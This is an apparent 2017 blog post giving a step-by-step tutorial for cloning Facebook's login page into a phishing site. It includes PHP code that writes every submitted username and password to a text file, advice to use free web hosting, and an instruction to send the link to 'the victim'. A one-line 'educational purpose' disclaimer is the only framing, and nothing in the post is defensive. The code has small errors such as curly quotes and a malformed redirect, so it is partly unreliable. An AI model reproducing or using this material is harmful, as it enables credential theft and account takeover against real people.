Tuesday 14 November 2017

Phishing (Fast)

This is only for educational purpose.
I am not liable for any thing.
1) Open any browser as your wish. (Recommended : Chrome)
2)Go to facebook login page. (facebook.com)
3) Press Ctrl+U to view page source.(A long code appears.)
4) Copy the code and open notepad in your computer and paste it.
5) After pasting the code in the notepad click on 'Ctrl + F'
6) Type action.
7) 

Now click on Find Next and search for action=” https://www.facebook.com/login.php?login_attempt=1" 
8) 

clear https://www.facebook.com/login.php?login_attempt=1 and replace it with login.php like below.
9) 
Now click file on the notepad and click on "save as" index.htm (not html please)

10 ) Open a new notepad and copy the bellow code and save it with the name login.php
        header (‘Location:http://www.google/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
11) Now you need to upload these two saved files in a free web hosting site
(Better to use http://www.000webhost.com )
12) Now click on view of index.htm it will look same as the Facebook page but it is now the original Facebook page. Copy the URL of the page and send it to you the victim. When he/she click on your URL your phishing page will show.
Thats it ✌ 
Thanks